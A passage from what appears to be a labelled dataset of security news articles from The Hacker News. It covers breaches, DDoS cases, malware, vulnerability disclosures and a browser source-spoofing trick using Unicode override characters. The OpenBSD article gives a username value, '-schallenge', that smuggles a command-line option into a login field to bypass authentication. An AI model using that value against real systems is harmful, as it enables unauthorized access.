likely be targeted by ""state-sponsored attackers."" Recently, one of the world's most popular cryptocurrency exchanges, Bitfinex, suffered a major hack that resulted in a loss of around $72 Million worth of Bitcoins. Now, Bitcoin.org, the website that hosts downloads for Bitcoin Core, posted a message on its website on Wednesday warning users that the next version of the Bitcoin Core wallet, one of the most popular bitcoin wallets used to store bitcoins, might be replaced with a malicious version of the software offered by government-backed hackers. Specifically, Chinese bitcoin users and services are encouraged to be vigilant ""due to the origin of the attackers."" Bitcoin.org doesn't believe it has sufficient resources to defend against the attack. However, the website did not reveal the name of the country planning the attack. The Warning Message from the Bitcoin.org site reads: ""Bitcoin.org has reason to suspect that the binaries for the upcoming Bitcoin Core release will likely be targeted by state-sponsored attackers. As a website, Bitcoin.org does not have the necessary technical resources to guarantee that we can defend ourselves from attackers of this calibre. We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website."" ""In such a situation, not being careful before you download [the software] could cause you to lose all your coins. This malicious software might also cause your computer to participate in attacks against the Bitcoin network."" Also Read: Bitcoin Exchange Offers $3.5 Million Reward for Information of Stolen Bitcoins. In such cases, it is likely that hackers will try to hijack and replace the official binary files used to run Bitcoin software on mining pools, either: By compromising the Bitcoin.org official site By conducting a man-in-the-middle attack to fake a cryptographic certificate that would allow hackers to intercept victim's encrypted HTTPS connection and replace the legitimate download with a malicious one, tricking users into installing a malicious version of the Bitcoin software. However, Bitcoin Core developer Eric Lombrozo told The Reg that ""there's absolutely nothing in the Bitcoin Core binaries, as built by the Bitcoin Core team, that has been targeted by state-sponsored attackers that we know of at this point."" ""Perhaps certain sites where people download the binaries could end up getting compromised, but let's not unnecessarily spread paranoia about the Bitcoin Core binaries themselves."" Verify Signatures and Hashes As a countermeasure, users are recommended to verify the Signature securely and hashes of Bitcoin Core binaries that are cryptographically signed with a key before running Bitcoin Core binaries to ensure the binaries are legitimate as being created by the Core developers team. ""We strongly recommend that you download that key, which should have a fingerprint of 01EA5486DE18A882D4C2684590C8019E36C2E964. You should securely verify the signature and hashes before running any Bitcoin Core binaries,"" the advisory states. Moreover, you are advised to download the binaries from the official Bitcoin site only; otherwise, you may end up getting compromised. ",Cyber_Attack "Indian Banks may switch to Linux, rather than taking extended Windows XP Support",https://thehackernews.com/2014/03/indian-banks-switching-to-linux-rather.html,"As we have reported you earlier that Microsoft is pulling out their Windows XP support after April 8 2014. Since a vast majority of bank ATMs around the world currently runs on Windows XP, but if they'll continue sticking to it after the deadline, then they'll be exposed to all kinds of security threats, as Microsoft will no longer provide the security patches thereafter. Many countries' Banks have got a way out, many banks have arranged or are in the process of arranging extended support for Windows XP for which they are ready to pay Microsoft millions of dollars, but may be not in the case of India. Yes, India will never feed Microsoft for providing extra support to the older version; rather they could switch over to the Linux operating system. India has around 115,000 ATMs across the country at present and the counts will go up in coming days, but the end of life for XP will not affect banks and functioning of ATMs as the financial institutions across the country are well prepared for life without the much popular OS, according to the Indian Banks Association (IBA). ATMs will continue to run the outdated system for some time past the expiration date, thanks to Windows Embedded powering ATMs, cash registers. According to Microsoft, Windows XP Embedded is less susceptible to viruses, and the company is providing support for it until early 2016. IBA says neither branches nor cash vending machines will be shut down once Microsoft stops support for the system from April 8. Many Banks have already moved to Windows 7, or are in the process of moving, which will require hardware upgrades and some are considering to choose Linux. These hardware upgrades and software enhancements might be a costly headache for ATM manufacturers and banks, but the improvements are a win for customers who use these machines on a daily basis. ""Banks are definitely well-prepared and the industry is seized of the matter. I am very sure that you will not see a problem where ATMs or bank counters are shut because of this,"" said the industry lobby's chief executive MV Tanksale at an event in Mumbai. ""Only the old ATMs may face some problem as all the newer machines are running on newer platforms,"" he added. Indian banks do not themselves operate their ATMs, rather outsource them to third-party vendors like Diebold and NCR. Girish Chavan, national manager of Diebold said, ""all ATMs are not connected to the Internet so a hacker would need to reach it through the bank's network,....and to breach a bank's firewall is not easy."" But maybe firms are underestimating the tactics of hackers and cybercriminals, who are always one step ahead in hacking ATMs and defeating all current security mechanisms. A few months back it was revealed at the Chaos Computing Congress that hackers in Europe are targeting ATM Machines using Malware-loaded USB drives to steal money. The malware infection rate for Windows XP is already almost six times higher than Windows 8 systems. So, to switch on to the other operating system will benefit the organizations and financial institutions. Moreover, Indian ATM manufacturer Vortex offers a low-power Linux based system called Ecoteller, for example, that's being used in developing countries. The Reserve Bank of India had highlighted the issue on Tuesday, saying banking operations may be hit once the Windows XP gets phased out. ""Banks are definitely well prepared and the industry is seized of the matter. I am very sure that you will not see a problem where ATMs or bank counters are shut because of this,"" chief executive MV Tanksale said. ""The probability of attacks on such a system may increase and it may be difficult to defend such attacks in the absence of Microsoft support,"" RBI had said in a circular to banks. The Tamil Nadu State Government's has recently advised all its departments to move on to free open source software BOSS Linux as a key benefit of it will ultimately be a huge saving to the government. ""Consider installing BOSS (Bharat Operating System Solutions) Linux as one of the mandatory operating system,"" said the order issued by the TN Information Technology Department. ""The huge investment cost involved in purchasing closed source software (such as Windows XP) may be avoided, which in turn translates into huge savings for the government,"" the order stated. So, if your Bank is planning to upgrade their ATMs, should it be Windows 7/8 or Linux?? ",Malware "Hacker Who DDoSed Sony, EA and Steam Gaming Servers Pleads Guilty",https://thehackernews.com/2018/11/gaming-server-ddos-attack.html,"A 23-year-old hacker from Utah pleaded guilty this week to launching a series of denial-of-service (DoS) attacks against multiple online services, websites, and online gaming companies between 2013 and 2014. According to a Justice Department (DoJ) press release, Austin Thompson, a.k.a. ""DerpTroll,"" took down servers of several major gaming platforms including Electronic Arts' Origin service, the Sony PlayStation network, and Valve Software's Steam, between December 2013 and January 2014, by flooding them with enough internet traffic. Thompson then typically used the Twitter account the @DerpTrolling handle to announce his attacks, subsequently posting screenshots or other photos of the server being unavailable after launching DDoS attacks. The attacks usually took down game servers and related computers of the victim companies for at least a few hours at a time, causing at least $95,000 in damages to the gaming companies around the world. ""Denial-of-service attacks cost businesses millions of dollars annually,"" said U.S. Attorney Adam Braverman while announcing the plea. ""We are committed to finding and prosecuting those who disrupt businesses, often for nothing more than ego."" Thompson pleaded guilty in federal court in San Diego on Thursday and was charged with causing damages to a protected computer, which carries a maximum penalty of 10 years prison, a fine of $250,000, as well as three years supervised release. Active since 2011, the DerpTrolling hacking group is believed to be operated by Thompson, who write malware used to launch the DDoS attacks against online services around the world. However, the hacking group made headlines in late 2013 and early 2014 after disrupting online gaming servers owned by Sony, Riot Games, Microsoft, Nintendo, Valve, and Electronic Arts. Thompson's sentencing is scheduled for March 1, 2019, before United States District Judge Jeffrey Miller. It wasn't just DerpTrolling that created chaos in 2014. The infamous Lizard Squad hacking group also made headlines in 2014 by launching DDoS attacks against Microsoft Xbox Live and Sony PlayStation Network and knocking them offline during the Christmas holidays. Several teenagers last year from around the world were charged with participating in the Lizard Squad 2014 DDoS attacks. ",Cyber_Attack Yahoo! Hack! How It Took Just One-Click to Execute Biggest Data Breach in History,https://thehackernews.com/2017/03/yahoo-data-breach-hack.html,"In the digital world, it just takes one click to get the keys to the kingdom. Do you know spear-phishing was the only secret weapon behind the biggest data breach in the history? It's true, as one of the Yahoo employees fell victim to a simple phishing attack and clicked one wrong link that let the hackers gain a foothold in the company's internal networks. You may be familiar with phishing attacks — an attempt to steal user credentials or financial data — while, Spear-phishing is a targeted form of phishing in which attackers trick employees or vendors into providing remote-access credentials or opening a malicious attachment containing an exploit or payload. Here's how the Yahoo's massive data breach was traced back to human error and who were the alleged masterminds behind this hack. On Wednesday, the US government charged two Russian spies (Dmitry Dokuchaev and Igor Sushchin) and two criminal hackers (Alexsey Belan and Karim Baratov) in connection with the 2014 Yahoo hack that compromised about 500 million Yahoo user accounts. While the indictment provided details on the 2014 Yahoo hack, the FBI officials recently gave a fresh insight into how the two officers from the Russian Federal Security Service (FSB) hired two hackers to gained initial access to Yahoo in early 2014. Here's How the Yahoo Hack Initiated: The hack began with a ""Spear Phishing"" e-mail sent to a ""semi-privileged"" Yahoo employees and not the company's top executives early in 2014. Although it is unclear how many Yahoo employees were targeted in the attack and how many emails were sent by the hackers, it only takes one employee to click on either a malicious attachment or a link, and it gave attackers direct access to Yahoo's internal networks. Russian Spies HIRED Cyber Criminals to Hack Into Yahoo Servers; Here's How They Did It. CLICK TO TWEET Once in, Alexsey Belan, who is already on the FBI's Most Wanted Hackers list, started poking around the network and, according to the FBI, discovered two key assets: Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users. The Account Management Tool – an administrative tool used to edit the database. Belan used the file transfer protocol (FTP) to download the Yahoo database, containing usernames, phone numbers, security questions and answers, and, what's worse, password recovery emails and a cryptographic value unique to each Yahoo account. Recovery emails and unique cryptographic values enabled Belan and fellow hacker Baratov to access the accounts of certain users requested by the Russian spies, Dokuchaev and Sushchin. Since the Account Management Tool did not allow for simple text searches of usernames, the hackers began identifying targets based on their recovery email address. Once identified, the hackers then used stolen cryptographic values called ""nonces"" to generate forged access cookies for specific user accounts, giving both the FSB agents and Belan access to users' email accounts without the need for any password. According to the FBI, those cookies were generated many times between 2015 and 2016 to access ""more than 6,500 Yahoo accounts,"" out of the roughly 500 million accounts. Victims Targeted by the Russian Spies: According to the indictment, among other foreign webmail and Internet-related service providers, the Russian spies accessed the Yahoo accounts belonging to: An assistant to the deputy chairman of Russia. An officer in Russia's Ministry of Internal Affairs. A trainer working in Russia's Ministry of Sports. Russian journalists. Officials of states bordering Russia. U.S. government workers. An employee of a Swiss Bitcoin wallet company. A U.S. airline worker. FBI special agent John Bennett told a news conference that Yahoo first approached the bureau in 2014, regarding the hack and was ""great partners"" during its investigation. However, the company took two years to go public in December 2016 with details of the data breach and advised hundreds of millions of its customers to change their passwords. Baratov was arrested on Tuesday by the Toronto Police Department, while Belan and the two FSB officers are in Russia. The United States has requested all the three to be handed over to face charges, but the US has no extradition treaty with Russia. ",Data_Breaches Dell Resets All Customers' Passwords After Potential Security Breach,https://thehackernews.com/2018/11/dell-data-breach-hacking.html,"Multinational computer technology company Dell disclosed Wednesday that its online electronics marketplace experienced a ""cybersecurity incident"" earlier this month when an unknown group of hackers infiltrated its internal network. On November 9, Dell detected and disrupted unauthorized activity on its network attempting to steal customer information, including their names, email addresses and hashed passwords. According to the company, the initial investigation found no conclusive evidence that the hackers succeeded to extract any information, but as a countermeasure Dell has reset passwords for all accounts on Dell.com website whether the data had been stolen or not. Dell did not share any information on how hackers managed to infiltrate its network at the first place or how many user accounts were affected, but the company did confirm that payment information and Social Security numbers were not targeted. ""Credit card and other sensitive customer information were not targeted. The incident did not impact any Dell products or services,"" Dell says. You are affected if you have ever created an account on the Dell website to purchase any of their products or to access the online support. ""Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation. Dell also retained a digital forensics firm to conduct an independent investigation and has engaged law enforcement,"" the company said. We will update this story as more information becomes available. ",Data_Breaches Ecuador Bank Hacked — $12 Million Stolen in 3rd Attack on SWIFT System,https://thehackernews.com/2016/05/swift-banking-hack.html,"Bangladesh is not the only bank that had become victim to the cyber heist. In fact, it appears to be just a part of the widespread cyber attack on global banking and financial sector by hackers who target the backbone of the world financial system, SWIFT. Yes, the global banking messaging system that thousands of banks and companies around the world use to transfer Billions of dollars in transfers each day is under attack. A third case involving SWIFT has emerged in which cyber criminals have stolen about $12 million from an Ecuadorian bank that contained numerous similarities of later attacks against Bangladesh's central bank that lost $81 Million in the cyber heist. The attack on Banco del Austro (BDA) in Ecuador occurred in January 2015 and, revealed via a lawsuit filed by BDA against Wells Fargo, a San Francisco-based bank on Jan. 28, Reuters reported. Here's how cyber criminals target banks: Uses malware to circumvent local security systems of a bank. Gains access to the SWIFT messaging network. Sends fraudulent messages via SWIFT to initiate cash transfers from accounts at larger banks. Over ten days, hackers used SWIFT credentials of a bank employee to modify transaction details for at least 12 transfers amounting to over $12 Million, which was transferred to accounts in Hong Kong, Dubai, New York and Los Angeles. In the lawsuit, BDA holds Wells Fargo responsible for not spotting the fraudulent transactions and has demanded Wells Fargo to return the full amount that was stolen from the bank. The lawsuit filed by BDA in a New York federal court described that the some of these attacks could have been prevented if banks would have shared more details about the attacks with the SWIFT organization. Wells Fargo has also fired back and blamed BDA's information security policies and procedures for the heist and noted that it ""properly processed the wire instructions received via authenticated SWIFT messages,"" according to court documents. According to reports, the heist remained a secret for a long time and now disclosed when BDA decided to sue Wells Fargo that approved the fraudulent transfers. SWIFT did not have any idea about the breach, as neither BDA nor Wells Fargo shared any detail about the attack. ""We were not aware,"" SWIFT said in a statement. ""We need to be informed by customers of such frauds if they relate to our products and services so that we can inform and support the wider community. We have been in touch with the bank concerned to get more information, and are reminding customers of their obligations to share such information with us."" It turns out that the security of SWIFT itself was not breached in the attack, but cyber criminals used advanced malware to steal credentials of bank's employees and cover their tracks. In February, $81 Million cyberheist at the Bangladesh central bank was carried out by hacking into SWIFT using a piece of malware that manipulated logs and erased the fraudulent transactions history, and even prevented printers from printing those transactions. ",Cyber_Attack Android Trojan GingerMaster Uses Gingerbread Root Exploit,https://thehackernews.com/2011/08/android-trojan-gingermaster-uses.html,"Android Trojan GingerMaster Uses Gingerbread Root Exploit As our smartphones become more ubiquitous and more powerful, they need to be protected in much the same way that you would protect your computer. Further to this, a malicious piece of malware has been discovered for devices powered by Android 2.3.3 Gingerbread, giving the hacker the ability to take complete control of the smartphone remotely. According to Assistant Professor Xuxian Jiang from the NCSU Department of Computer Science, the new threat, which his team has dubbed GingerMaster, is the first malware to use the root exploit for Android 2.3. ""As this is the first time such malware has been identified, it is not surprising when our experiments show that it can successfully evade the detection of all tested (leading) mobile anti-virus software,"" he writes. Once the GingerMaster malware is installed and has root privileges, it then reaches out to a remote command-and-control server and asks for instructions. It then has the ability to download and install apps on its own, without the user's permission, Jiang found. GingerMaster is an evolution of the existing DroidKungFu malware, which had some of the same functionality. Earlier this week, Jiang's team also found other variants of DroidKungFu in several dozen infected apps in alternate Android app stores. That version included a couple of root exploits as well, but for earlier versions of Android. As far as we can tell, no ""official"" applications being offered through Android Market have been affected by GingerMaster, but it's best to err on the side of caution when it comes to these things. Recognize that your Android smartphone is very much a computer and, as such, is just as vulnerable to attacks as your home PC. The researchers recommend that users take several steps to protect themselves. The first one is to run a mobile antivirus product. There are several free solutions available from vendors like Lookout, AVG, BitDefender or Symantec.Then, users should only download apps from trusted marketplaces, like the official Android Market. Unfortunately, there is no assurances that malware won't slip through the cracks and appear on these services from time to time, but the chances are lower than in other places.Finally, users should make a habit from reading and understanding the permissions requested by apps on installation. Trojanized apps will usually require permissions that legit versions wouldn't need. ",Malware Malware that transfers stolen data using Inaudible Audio signals,https://thehackernews.com/2013/12/Malware-Inaudible-Audio-signals-badbios-virus.html,"If you think that a computer which is not connected to a network, doesn't have any USB sticks attached to it and doesn't accept any kind of electronic connection requests are reasonably safe against hackers and from all the malware, then you are Wrong. Here we have something shocking update that Some German Scientists have developed a proof of concept Malware prototype, could allow a hacker to infect your computers and other digital devices just using Inaudible Audio signals. The ability to bridge an air gap could be a potent infection vector. Just imagine, a cyber attack using high-frequency sound waves to infect machines, where stolen data also can be transferred back to attacker without a network connection, Sounds very terrifying ? When a few weeks ago, a security researcher Dragos Ruiu claimed malware dubbed badBIOS allowed infected machines to communicate using sound waves alone, means that the devices are physically disconnected from any networks, including the internet, people said he was crazy. But Now German Researchers have published a paper on how malware can be designed to cross the air gap by transmitting information through speakers and recording it via microphone. Rather than relying on TCP-IP, they used a network stack originally developed for underwater communication and the signal was propagated through the use of a software-defined modem based on the GNU Radio project. In a scenario based hacking, ""The infected victim sends all recorded keystrokes to the covert acoustical mesh network. Infected drones forward the keystroke information inside the covert network till the attacker is reached, who is now able to read the current keyboard input of the infected victim from a distant place."" paper explained. In another scenario, the researchers used sound waves to send keystroke information to a network-connected computer, which then sent the information to the attacker via email. While the research doesn't prove Dragos Ruiu's badBIOS claims, but it does show that even if the system is disconnected from any network, could still be vulnerable to attackers. However, I would like to appreciate Dragos dedication about badBIOS research because this extraordinary concept was first introduced by him only. Researchers POC Malware is able to transfer data at 20 bits per second only, which is very low, but that's still capable of transferring your password or credit card number to the hacker in a few seconds. Some basic countermeasures one can adopt to protect against such malware are: Switching off the audio input and output devices from the system. Employ audio filtering that blocks high-frequency ranges. Using an Audio Intrusion Detection Guard. Lets see how Antivirus companies will handle such threats to protect home users. ",Malware Severe Auth Bypass and Priv-Esc Vulnerabilities Disclosed in OpenBSD,https://thehackernews.com/2019/12/openbsd-authentication-vulnerability.html,"OpenBSD, an open-source operating system built with security in mind, has been found vulnerable to four new high-severity security vulnerabilities, one of which is an old-school type authentication bypass vulnerability in BSD Auth framework. The other three vulnerabilities are privilege escalation issues that could allow local users or malicious software to gain privileges of an auth group, root, as well as of other users, respectively. The vulnerabilities were discovered and reported by Qualys Research Labs earlier this week, in response to which OpenBSD developers released security patches for OpenBSD 6.5 and OpenBSD 6.6 just yesterday—that's in less than 40 hours. Here's a brief explanation of all four security vulnerabilities in OpenBSD—a free and open-source BSD-based Unix-like operating system—along with their assigned CVE identifiers OpenBSD Authentication Bypass (CVE-2019-19521) The authentication bypass vulnerability resides in the way OpenBSD's authentication framework parses the username supplied by a user while logging in through smtpd, ldapd, radiusd, su, or sshd services. Using this flaw, a remote attacker can successfully access vulnerable services with any password just by entering the username as ""-schallenge"" or ""-schallenge: passwd,"" and it works because a hyphen (-) before username tricks OpenBSD into interpreting the value as a command-line option and not as a username. Here, OpenBSD's authentication framework interprets ""-schallenge"" as ""-s challenge,"" which forces the system into silently ignoring the challenge protocol that eventually bypasses the authentication automatically. ""If an attacker specifies a username of the form '-option', they can influence the behavior of the authentication program in unexpected ways,"" the advisory said. According to the researchers, this vulnerability is practically exploitable in smtpd, ldapd, and radiusd, but not in sshd or su due to their defense-in-depth mechanisms that hang the connection even after successful authentication bypass. However, one can still remotely exploit the flaw against sshd to determine whether an OpenBSD system is vulnerable to CVE-2019-19521 or not. OpenBSD Local Privilege Escalation Flaws As described above, the other OpenBSD vulnerabilities are local privilege escalation issues as briefly explained below: CVE-2019-19520: Due to the mishandling of environment-provided paths used in dlopen(), xlock, which comes installed by default on OpenBSD, could allow local attackers to escalate privileges to 'auth' group. CVE-2019-19522: Due to incorrect operation of authorization mechanisms via ""S/Key"" and ""YubiKey,"" which is a non-default configuration, a local attacker with 'auth' group permission can gain full privileges of the root user. CVE-2019-19519: Due to a logical error in one of the su's primary functions, a local attacker can achieve any user's login class, often excluding root, by exploiting su's -L option. Qualys researchers have also released proof-of-concept exploits for each vulnerability in its advisory. Since patches for all four security vulnerabilities are now available, affected OpenBSD users recommended to install patches using syspatch mechanism. ",Vulnerability Anti-DDoS Services Abused to Carry Out DDoS Attack with 1.5 Billion Requests/Minute,https://thehackernews.com/2014/05/anti-ddos-services-abuse-to-ddos-at-15.html,"Till Now the Internet was encountering the traditional Distributed Denial of Service (DDoS) attacks, where a large number of compromised systems use to flood servers with tremendous amount of bandwidth; but in past few months we have noticed massive change in the techniques of DDoS attack. Hackers are using creative, but evil DDoS techniques such as NTP and DNS Amplification DDoS attacks. Last month we have seen that how cybercriminals abused a vulnerability in one of the biggest Chinese video hosting website Sohu.com to convert their millions of visitors to participate into the Layer 7 (Application Layer) DDoS attack with 20 Million requests. According to the new report released by a US based security solutions provider Incapsula, another interesting DDoS attack activities have been noticed by the researchers in which an attacker abused two major anti-DDoS Service providers to perform massive DDoS attack on other websites. Its really EPIC that the services who should protect websites from DDoS attack, itself compromised to perform DDoS on other web services. The researchers at the security firm noticed a surge of massive DNS DDoS attack on one of its client, peaking at approximately 25Mpps (Million packets per second). ""With multiple reports coming from different directions, and with several large scale attacks on our own infrastructure, we are now convinced that what we are seeing here is an evolving new trend - one that can endanger even the most hardened network infrastructures,"" reads the report. This time, hacker used the DNS DDoS attack, which is totally different and more responsive from the previously most commonly used DNS amplification attack by the hackers, both in their methods of execution and in the type of trouble they aim to deliver. DNS amplification attack is an asymmetrical DDoS attack in which the attacker set the source address to that of the targeted victim by using spoofed Internet Protocol (IP) of the target, which means the target receives the replies from all the DNS servers that are used, making it the recipient of much larger DNS responses. ""With these attacks the offender's goal is to achieve network saturation by continuously exhausting the target's bandwidth capacity,"" Incapsula wrote. But its totally different in the case of DNS DDoS attack as DNS floods are symmetrical DDoS attacks in which the attacker tries to exhaust the server-side assets (for e.g., memory or CPU) with the large number of UDP requests generated by the malicious scripts running on several compromised botnet machines. The packets sends per seconds are even larger in this case compare to DNS amplification attack. ""With DNS amplification, the effectiveness of an attacker's own resources is increased by anywhere from 300% to 1000%, which means that large attacks could be initiated by relatively small botnets"", says the report. ""On the other hand, with DNS floods there is no multiplier to speak of at all. This means that, in order to generate a DNS flood at the rate of 25Mpps, the offender needs access to an equally powerful botnet infrastructure."" By using the same DNS DDoS attack, the hacker succeeded in sending the malicious requests through two different servers at a rate of 1.5 Billion DNS queries per minute, amounting to over 630 Billion requests during the course of the 7 hour-long DDoS attack. Both the servers used by the attacker belongs to anti-DDoS service providers, one of which is based in Canada and the other in China. After acknowledging the attack, Incapsula informed both the anti-DDoS vendors, which then dropped the responsible clients from using their services. ""Malicious misuse of security solutions is anything but new. However, this is the first time we encountered ""rogue"" scrubbing servers used to carry out large-scale DDoS attacks. This fact, combined with the inherit danger of non-amplified DNS floods, is what makes these attacks so devastatingly dangerous,"" the researchers said. DNS Amplification DDoS attack could be defended by dropping all unexpected DNS responses to port 53, whereas DNS Flood queries are difficult to differentiate from the legitimate DNS queries, and it is not possible to drop all DNS queries in order to migrate the attack. However this could be filtered when individually processed at the server level, but such process is practically very difficult to execute. Thankfully, the Impact of DNS Flood attack depends upon the capacity of the attacker's own resources. As we all have seen that DDoS trend is changing and to perform massive DDoS attacks, hacker are using every tantrum by leveraging the weakness of different protocols and boosting the sizes of Distributed Denial of Service (DDoS) attack. ",Vulnerability Experts Reported Security Bug in IBM's Db2 Data Management Software,https://thehackernews.com/2020/08/ibm-data-management.html,"Cybersecurity researchers today disclosed details of a memory vulnerability in IBM's Db2 family of data management products that could potentially allow a local attacker to access sensitive data and even cause a denial of service attacks. The flaw (CVE-2020-4414), which impacts IBM Db2 V9.7, V10.1, V10.5, V11.1, and V11.5 editions on all platforms, is caused by improper usage shared memory, thereby granting a bad actor to perform unauthorized actions on the system. By sending a specially crafted request, an attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service, according to Trustwave SpiderLabs security and research team, which discovered the issue. ""Developers forgot to put explicit memory protections around the shared memory used by the Db2 trace facility,"" SpiderLabs's Martin Rakhmanov said. ""This allows any local users read and write access to that memory area. In turn, this allows accessing critically sensitive data as well as the ability to change how the trace subsystem functions, resulting in a denial of service condition in the database."" IBM released a patch on June 30 to remediate the vulnerability. CVE-2020-4414 is caused by the unsafe usage of shared memory the Db2 trace utility employs to exchange information with the underlying OS on the system. The Db2 trace utility is used to record Db2 data and events, including reporting Db2 system information, collecting data required for performance analysis and tuning, and capture data access audit trail for security purposes. Given that the shared memory stores sensitive information, an attacker with access to the system could create a malicious application to overwrite the memory with rogue data dedicated to tracing data. ""This means that an unprivileged local user can abuse this to cause a denial of service condition simply by writing incorrect data over that memory section,"" Rakhmanov said. Even more concerning, a low-privileged process running on the same computer as the Db2 database could alter Db2 trace and capture sensitive data and use the information to carry out other attacks. If the flaw sounds familiar, that's because it's the same type of memory leakage vulnerability that impacted Cisco's WebEx video conferencing service (CVE-2020-3347) that could local authenticated attackers to get hold of usernames, authentication tokens, and meeting information. It's recommended that Db2 users update their software to the latest version to mitigate the risk. ",Vulnerability [Guide] How to Protect Your Devices Against Meltdown and Spectre Attacks,https://thehackernews.com/2018/01/meltdown-spectre-patches.html,"Recently uncovered two huge processor vulnerabilities called Meltdown and Spectre have taken the whole world by storm, while vendors are rushing out to patch the vulnerabilities in its products. The issues apply to all modern processors and affect nearly all operating systems (Windows, Linux, Android, iOS, macOS, FreeBSD, and more), smartphones and other computing devices made in the past 20 years. What are Spectre and Meltdown? We have explained both, Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753, CVE-2017-5715), exploitation techniques in our previous article. In short, Spectre and Meltdown are the names of security vulnerabilities found in many processors from Intel, ARM and AMD that could allow attackers to steal your passwords, encryption keys and other private information. Both attacks abuse 'speculative execution' to access privileged memory—including those allocated for the kernel—from a low privileged user process like a malicious app running on a device, allowing attackers to steal passwords, login keys, and other valuable information. Protect Against Meltdown and Spectre CPU Flaws Some, including US-CERT, have suggested the only true patch for these issues is for chips to be replaced, but this solution seems to be impractical for the general user and most companies. Vendors have made significant progress in rolling out fixes and firmware updates. While the Meltdown flaw has already been patched by most companies like Microsoft, Apple and Google, Spectre is not easy to patch and will haunt people for quite some time. Here's the list of available patches from major tech manufacturers: Windows OS (7/8/10) and Microsoft Edge/IE Microsoft has already released an out-of-band security update (KB4056892) for Windows 10 to address the Meltdown issue and will be releasing patches for Windows 7 and Windows 8 on January 9th. But if you are running a third-party antivirus software then it is possible your system won't install patches automatically. So, if you are having trouble installing the automatic security update, turn off your antivirus and use Windows Defender or Microsoft Security Essentials. ""The compatibility issue is caused when antivirus applications make unsupported calls into Windows kernel memory,"" Microsoft noted in a blog post. ""These calls may cause stop errors (also known as blue screen errors) that make the device unable to boot."" Apple macOS, iOS, tvOS, and Safari Browser Apple noted in its advisory, ""All Mac systems and iOS devices are affected, but there are no known exploits impacting customers at this time."" To help defend against the Meltdown attacks, Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2, has planned to release mitigations in Safari to help defend against Spectre in the coming days. Android OS Android users running the most recent version of the mobile operating system released on January 5 as part of the Android January security patch update are protected, according to Google. So, if you own a Google-branded phone, like Nexus or Pixel, your phone will either automatically download the update, or you'll simply need to install it. However, other Android users have to wait for their device manufacturers to release a compatible security update. The tech giant also noted that it's unaware of any successful exploitation of either Meltdown or Spectre on ARM-based Android devices. Firefox Web Browser Mozilla has released Firefox version 57.0.4 which includes mitigations for both Meltdown and Spectre timing attacks. So users are advised to update their installations as soon as possible. ""Since this new class of attacks involves measuring precise time intervals, as a partial, short-term mitigation we are disabling or reducing the precision of several time sources in Firefox,"" Mozilla software engineer Luke Wagner wrote in a blog post. Google Chrome Web Browser Google has scheduled the patches for Meltdown and Spectre exploits on January 23 with the release of Chrome 64, which will include mitigations to protect your desktop and smartphone from web-based attacks. In the meantime, users can enable an experimental feature called ""Site Isolation"" that can offer some protection against the web-based exploits but might also cause performance problems. ""Site Isolation makes it harder for untrusted websites to access or steal information from your accounts on other websites. Websites typically cannot access each other's data inside the browser, thanks to code that enforces the Same Origin Policy."" Google says. Here's how to turn on Site Isolation: Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key. Look for Strict Site Isolation, then click the box labelled Enable. Once done, hit Relaunch Now to relaunch your Chrome browser. Linux Distributions The Linux kernel developers have also released patches for the Linux kernel with releases including versions 4.14.11, 4.9.74, 4.4.109, 3.16.52, 3.18.91 and 3.2.97, which can be downloaded from Kernel.org. VMware and Citrix A global leader in cloud computing and virtualisation, VMware, has also released a list of its products affected by the two attacks and security updates for its ESXi, Workstation and Fusion products to patch against Meltdown attacks. On the other hand, another popular cloud computing and virtualisation vendor Citrix did not release any security patches to address the issue. Instead, the company guided its customers and recommended them to check for any update on relevant third-party software. ",Vulnerability Exclusive - Source Code Spoofing with HTML5 and the LRO Character,https://thehackernews.com/2012/03/exclusive-source-code-spoofing-with.html,"Exclusive - Source Code Spoofing with HTML5 and the LRO Character Article Written by John Kurlak for The Hacker News,He is senior studying Computer Science at Virginia Tech. Today John will teach us that How to Spoof the Source Code of a web page. For example, Open https://www.kurlak.com/john/source.html and Try to View Source Code of the Page ;-) Can you View ?? About eight months ago, I learned about HTML5's new JavaScript feature, history.replaceState(). The history.replaceState() function allows a site developer to modify the URL of the current history entry without refreshing the page. For example, I could use the history.replaceState() function to change the URL of my page in the address bar from ""https://www.kurlak.com/example.html"" to ""https://www.kurlak.com/example2.html"" When I first learned of the history.replaceState() function, I was both skeptical and curious. First, I wanted to see if history.replaceState() supported changing the entire URL of a page, including the hostname. Fortunately, the developers were smart enough to prevent that kind of action. Next, I noticed that if I viewed the source code of a page after replacing the URL, it attempted to show the source code of the new page. I started brainstorming ways I could make the URL look the same but have a different underlying representation. Such a scenario would make it so that I could ""hide"" the source code of a page by masking it with another page. I remembered encountering a special Unicode character some time back that reversed all text that came after it. That character is called the ""right to left override"" (RLO) and can be produced with decimal code 8238. I tried to create an HTML page, ""source.html,"" that would use history.replaceState() to replace the URL of the page with: [RLO] + ""lmth.ecruos"" (the reversed text of ""source.html""). When the browser rendered the new URL, the RLO character reversed the letters after it, making the browser display ""source.html"" in the address bar. However, when I went to view the source of the web page, my browser tried to view the source of ""‮lmth.ecruos"" instead (the characters, ""‮,"" are the ASCII representation of the hex codes used to represent the RLO character). Thus, I created a page, ""‮lmth.ecruos"" and put some ""fake"" source code inside. Now, when I went to ""source.html,"" the URL was replaced with one that rendered the same, and when I viewed the source of the page, it showed my ""fake"" source code. The code I used for ""source.html"" was: However, there was a downfall: if the user tried to type after the RLO character in the address bar, his or her text would show up backwards, a clear indication that something strange was going on. I brainstormed additional solutions. I soon found that there was also a ""left to right override"" (LRO) character. I discovered that placing the LRO character within text that is already oriented left to right does not do anything. I decided to add the LRO character to the end of my URL and used the following code: Then, I simply had to create ""source.html‭"" and put my ""fake"" source code in it. It worked! Now the user could type normally without seeing anything funny. However, this new code still has two downfalls. The first downfall is that the script appears to work only for Google Chrome (I tested the script in Chrome 17.0.963.79 m). Firefox 11 escapes the RLO character, so the user sees ""%E2%80%AElmth.ecruos"" in the URL bar instead of ""source.html."" (I have had reports, however, that the ""exploit"" works in Firefox 11 on Linux. I have not yet confirmed those reports). Internet Explorer 9 does not yet support history.replaceState(), but apparently Internet Explore 10 will. Opera 11 and Safari 5 both show ""source.html"" in the address bar, but 